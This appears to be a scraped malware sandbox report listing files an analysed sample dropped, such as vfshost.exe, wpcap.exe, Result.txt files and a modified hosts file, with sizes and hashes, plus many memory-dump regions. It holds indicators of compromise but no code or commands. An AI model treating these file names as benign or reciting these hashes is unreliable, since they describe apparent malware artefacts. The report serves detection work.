219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\hrmeszcf\pnreyic.exe

Filesize
7.1MB

MD5
35e9ef5e4fa44509e1ff3e034f1bd193

SHA1
b7855e6391d239f9d707320b0f455ea462b95530

SHA256
5361e6e124a588157c99885d46a548e1f9c40f87b6b42d34fcec5a20a8eaabf1

SHA512
a346d10a81180aff77022afe0d2975cc264b0f8c9af564217e103d0f9f6f9253d92aa1899015a46f5e7a06db27024e0069c99580301c5d6f97e50328cf55ef58

Download Submit
C:\Windows\nblmptktz\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\nblmptktz\etgfqftjv\Result.txt

Filesize
738B

MD5
0cf41afbc46e96bac14efeefe3e8cdde

SHA1
95ea86e2a502bedf96792da24af40170e8216546

SHA256
0f06430ed4eba0bd165693f94fe520c22df8f62849c9b9d1c7b407b03337db4b

SHA512
8603b361c42d2d1f5ac1676ef1693126b1121dcaa58667b68f90c1715335da5087ec668f32c65a696cff3683af5d8a7931da00a64e37c77b5d3b6d661268d412

Download Submit
C:\Windows\nblmptktz\etgfqftjv\Result.txt

Filesize
1KB

MD5
c424621e37ef58ead0daf1f985703752

SHA1
4cfe9b3a6ae930195cfd85c58cf32511951f32bd

SHA256
c2c2babcda3a889612f5cfd1bccf44746a6ac4f0c023f354dc6ae4de2a42bf07

SHA512
27771b1070db1c135fca0fac780f1a80ec0690ab19a2f7b4b35d2885222e4a8c7f10f25987618a5de0db2075231379103e2a01eb9431590b0a9104d1ab8ced7f

Download Submit
C:\Windows\nblmptktz\etgfqftjv\Result.txt

Filesize
2KB

MD5
e288e1bed373581a20bc93614a403e61

SHA1
4af840c3081b8bd7a5ea621f378c6672a0737ba6

SHA256
a606bf168c13a77255b41a089a1bcf0526aa23476d17d4c22f3302fb75e7aaae

SHA512
62dcc86a18483b34586f48fee71ec54b4d0261f555179daf0b483c73910e11a2d8945b784759d95b85bcd925dc4d296d7a8a824a127dcc11225193fef1d5e55e

Download Submit
C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\nblmptktz\etgfqftjv\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/312-210-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/372-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/524-175-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/728-189-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/1020-78-0x00000000015A0000-0x00000000015EC000-memory.dmp

Filesize
304KB

Download
memory/1252-193-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/1264-231-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/1752-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/1752-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/1908-221-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-257-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-200-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-381-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-378-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-377-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-182-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-268-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-178-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-212-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-249-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-232-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-165-0x00007FF629280000-0x00007FF6293A0000-memory.dmp

Filesize
1.1MB

Download
memory/1908-168-0x000001979E0C0000-0x000001979E0D0000-memory.dmp

Filesize
64KB

Download
memory/2232-248-0x00000000002D0000-0x00000000002E2000-memory.dmp

Filesize
72KB

Download
memory/2424-135-0x00007FF759D00000-0x00007FF759DEE000-memory.dmp

Filesize
952KB

Download
memory/2424-138-0x00007FF759D00000-0x00007FF759DEE000-memory.dmp

Filesize
952KB

Download
memory/2488-171-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/3044-202-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/3276-224-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/3284-197-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/3288-180-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/3300-228-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/3644-236-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/3732-234-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/3972-219-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/4060-206-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/4144-142-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/4144-160-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/4508-215-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/4792-185-0x00007FF683D20000-0x00007FF683D7B000-memory.dmp

Filesize
364KB

Download
memory/4948-149-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4948-162-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download